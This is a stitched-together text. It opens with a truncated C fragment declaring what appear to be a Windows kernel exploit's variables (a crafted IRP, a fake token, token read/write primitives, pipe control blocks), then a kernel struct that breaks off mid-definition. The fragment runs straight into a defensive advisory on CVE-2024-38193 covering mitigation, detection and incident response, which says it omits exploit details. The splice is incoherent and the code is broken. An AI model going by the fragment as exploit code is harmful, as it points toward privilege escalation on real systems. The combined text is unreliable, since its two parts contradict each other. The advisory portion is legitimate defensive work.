_IRP* crafted_irp;
IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
void* p_mem_0x30;
void* p_mem_0xD0_2;
_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
ACL* VariablePartDefaultDacl;
ACL* VariablePartDefaultDacl2;
_ERESOURCE* TokenLock;
void* PrimaryGroup;
int sizeOfClientTokenAndObjectHeader;
PSEP_SID_VALUES_BLOCK TokenSidValues;
_SECURITY_CLIENT_CONTEXT* security_client_context;
_SEP_LOGON_SESSION_REFERENCES* LogonSession;
_TOKEN* fakeToken;
void *pipe_100_im_control_block;
void* pipe_100_rw_control_block;
void* p_mem_Pipe_hToPipe_1000_rw;
void* p_mem_Pipe_hToPipe_1000_rw_2;
HANDLE hPipeIM;
HANDLE hPipeRW;
HANDLE hFileIM;
HANDLE hFileRW;
HANDLE IncPrimitiveTOKEN;
HANDLE RWPrimitiveTOKEN;
};
//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER
{
union
{
volatile LONG Lock; //0x0
LONG LockNV; //0x0
struct
{
UCHAR Type; //0x0
UCHAR Signalling; //0x1
UCHAR Size; //0x2
UCHAR Reserved1; //0x3
};
struct
{
UCHAR TimerType; //0x0
union
{
UCHAR TimerControlFlags; //0x1
struct
{
UCHAR Absolute : 1;
Microsoft Windows 11 Pro 23H2 — Ancillary Function Driver for WinSock Privilege Escalation (CVE-2024-38193)
This article provides a high-level, defensive analysis of the Ancillary Function Driver (AFD) WinSock privilege-escalation vulnerability tracked as CVE-2024-38193. It explains what the vulnerability means, why it matters, how to prioritize and mitigate risk, and how security teams can detect and respond — without providing exploit details or step-by-step attack instructions.
Executive summary
CVE-2024-38193 is a local privilege escalation (LPE) vulnerability affecting the Windows Ancillary Function Driver (AFD) component used by WinSock. An attacker who already has code running under a local account could leverage the vulnerability to gain elevated privileges on vulnerable Windows 11 23H2 systems. Because LPEs are frequently used as post-compromise escalation vectors, organizations should treat this as high priority for patching and monitoring.
What is the AFD / WinSock component?
- The Ancillary Function Driver (AFD) is a kernel-level component used by the Windows networking stack (WinSock) to manage sockets and other networking operations.
- AFD runs in kernel context and therefore has high privileges. Vulnerabilities in kernel drivers can allow privilege escalation or kernel memory corruption when abused by a local user or process.
- CVE-2024-38193 relates specifically to how AFD handles certain local requests; a successful exploit allows privilege escalation from a lower-privileged local account to SYSTEM or comparable elevated context.
Why this vulnerability matters
- Local privilege escalations are commonly chained with initial access techniques (phishing, remote code execution, or credential theft) to gain full control of an endpoint.
- Because AFD is a core kernel component, exploitation can lead to full system compromise, persistence, and the ability to tamper with other security controls.
- Exploitation is local-only (requires code running locally), so protecting endpoints and restricting lateral movement reduces exposure.
Affected systems and scope
Publicly available information associates this issue with Windows 11 Pro 23H2 in observed testing. Comprehensive, vendor-supplied affected product lists and mitigations are the authoritative source; security teams should consult the Microsoft Security Update Guide or their vendor advisory for exact build and OS edition coverage.
High-level technical summary (non-actionable)
- The vulnerability arises in AFD’s handling of certain local I/O requests. Improper validation or handling at the kernel-driver boundary can let a low-privileged user manipulate execution context or credentials.
- Successful exploitation leads to privilege escalation by allowing an attacker-controlled context to obtain or impersonate a higher-privilege token or to execute code in a higher-privileged process.
- This description intentionally omits low-level memory offsets, IOCTL values, or exploitation steps to avoid enabling misuse.
Risk assessment and prioritization
- Exploitability: Medium to high for local attackers who can run code on an endpoint.
- Impact: High — potential for SYSTEM-level access, persistence, and evasion of controls.
- Likelihood: Depends on exposure controls. Endpoints with unprivileged local accounts, developer tools, or users with permission to run unsigned code are at higher risk.
- Action priority: Apply vendor patches ASAP; implement compensating controls where immediate patching is not possible.
Mitigation and remediation
Follow a defense-in-depth approach and prioritize official patches and vendor guidance:
- Apply vendor updates: Install Microsoft security updates addressing CVE-2024-38193 as soon as they are available and validated in your environment.
- Patch management: Use automated patch orchestration and test staging to accelerate rollout to production endpoints.
- Least privilege: Enforce principle of least privilege for local accounts; avoid granting administrative privileges where not required.
- Application control: Block or restrict arbitrary local code execution using AppLocker, Windows Defender Application Control (WDAC), or similar policies.
- Credential protections: Enable LSA protection, Credential Guard, and restrict access to sensitive service accounts on endpoints.
- EDR and kernel integrity: Ensure endpoint detection & response (EDR) solutions with kernel instrumentation are deployed and configured to alert on anomalous kernel interactions and suspicious local exploitation attempts.
Detection strategies (defensive guidance)
Detection should focus on early indicators and post-exploitation artifacts rather than driver-level exploitation details. Suggested defensive measures include:
- Monitor for unexpected privilege escalations and processes starting with elevated tokens that are not explainable by normal workflows.
- Look for anomalous process behavior on endpoints where users do not typically run development or networking tools (for example, unsigned local utilities launched in a user context that then spawn SYSTEM-level processes).
- Correlate EDR alerts for kernel anomalies with local process creation and authentication events.
- Enable and collect relevant Windows auditing logs (Process Creation, Token Elevation, Kernel Audit events if supported by your tooling) into your SIEM for correlation and triage.
- Track patch compliance and generate alerts for systems missing the vendor fix.
Example detection indicators (non-actionable)
Below are high-level examples of what to monitor; these are intended as defensive detection ideas, not exploit recipes:
- Unexpected creation of high-privilege processes (e.g., cmd.exe, powershell.exe) from non-administrator users.
- EDR or kernel monitoring alerts indicating abnormal interactions with networking drivers, kernel objects, or impersonation attempts.
- Event log sequences showing a low-privilege process followed by rapid token elevation or unusual parent/child process relationships.
- Inventory deviations showing the presence of atypical local binaries or tools on endpoints where they shouldn’t be.
Incident response and forensics guidance
- If you suspect exploitation, isolate the affected system(s) from the network to prevent lateral movement and data exfiltration.
- Capture volatile forensic artifacts: memory image, running process list, loaded kernel drivers, and relevant event logs. Work with forensic specialists to preserve chain-of-custody for investigations.
- Collect EDR telemetry for the time window of suspected activity and search for indicators of escalation or kernel manipulation.
- Rebuild or reimage compromised systems after confirming scope and ensuring the root cause (vulnerable driver/version) has been mitigated.
- Rotate credentials and service account secrets that may have been exposed or elevated during the compromise.
Hardening checklist
| Control | Recommended action |
|---|---|
| Patching | Apply Microsoft security updates for CVE-2024-38193 across all Windows 11 23H2 systems immediately. |
| Least privilege | Remove unnecessary local admin rights; use privileged access workstations and just-in-time administrative models. |
| Application control | Enforce AppLocker/WDAC to prevent execution of unauthorized local binaries. |
| EDR/Logging | Ensure advanced endpoint telemetry is enabled and logs are centrally collected and retained for investigation. |
| Credential protection | Enable Credential Guard and LSA protection where supported, and restrict access to secrets and tokens. |
| Network segmentation | Limit lateral movement by segmenting endpoints and restricting unnecessary services and remote access. |
Communications and policy actions
- Inform system owners and IT operations of the vulnerability, expected impact, and patch timeline.
- Prioritize endpoints that handle sensitive data, have privileged users, or are internet-facing for the initial patch wave.
- Update incident response playbooks to include local privilege escalation scenarios and ensure tools for memory capture and kernel artifact analysis are available to responders.
Where to get authoritative information
- Microsoft Security Update Guide and official Microsoft advisories for CVE-2024-38193.
- Common Vulnerabilities and Exposures (CVE) database entry for CVE-2024-38193 for reference details.
- Your endpoint security vendor or EDR provider for detection signatures and behavioral rules tuned to this issue.
Summary and recommended next steps
Address CVE-2024-38193 by patching affected Windows 11 23H2 systems as the top priority. In parallel, strengthen endpoint defenses through least-privilege enforcement, application control, EDR monitoring, and targeted detection rules for anomalous privilege escalations. Maintain an incident response posture that can capture forensic artifacts and contain suspected compromises quickly. Avoid relying solely on perimeter controls — LPEs are local threats and require robust endpoint hygiene.
For technical teams, consult Microsoft’s advisory for precise affected versions and remediation steps. For security operations, prioritize detection of unauthorized token elevations and anomalous kernel-level activity and ensure sensitive systems are patched first.